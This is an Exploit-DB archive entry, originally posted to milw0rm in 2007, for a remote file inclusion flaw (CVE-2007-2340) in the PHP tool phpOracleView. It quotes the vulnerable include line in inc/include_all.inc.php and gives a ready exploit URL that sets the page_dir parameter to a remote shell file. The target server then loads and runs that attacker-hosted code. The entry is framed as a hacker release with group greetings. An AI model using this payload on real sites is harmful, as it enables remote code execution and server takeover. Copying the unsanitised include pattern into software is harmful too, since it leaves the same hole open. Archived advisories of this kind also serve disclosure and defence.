phpOracleView include_all.inc.php page_dir RFI Vulnerability

2007-04-26T00:00:00
ID EDB-ID:3803
Type exploitdb
Reporter Alkomandoz Hacker
Modified 2007-04-26T00:00:00

Description

phpOracleView (include_all.inc.php page_dir) RFI Vulnerability. CVE-2007-2340. Webapps exploit for php platform

                                        
                                            ===============================
phporacleview =>  (page_dir) Remote File Inclusion Exploit
===============================

Discoverd By : Alkomandoz Hacker


HomePge= Asb-May.Net & Mohandko.com & Sniper-sa.com & Tryag.com

================================

Script Name: phporacleview

Download Script: http://webxadmin.free.fr/download/phporacleview.zip


=================================
Bug in :

phporacleview/inc/include_all.inc.php

=======

<?
include($page_dir . $inc_dir . "config.inc.php");

==================================


Exploit :
--------------------------------

http://localhost/phporacleview/inc/include_all.inc.php?page_dir=http://Shell.txt?

===================================

GreetZ : AsbMay's Groups & City Of Ghosts Team & Sniper-sa TeAm

# milw0rm.com [2007-04-26]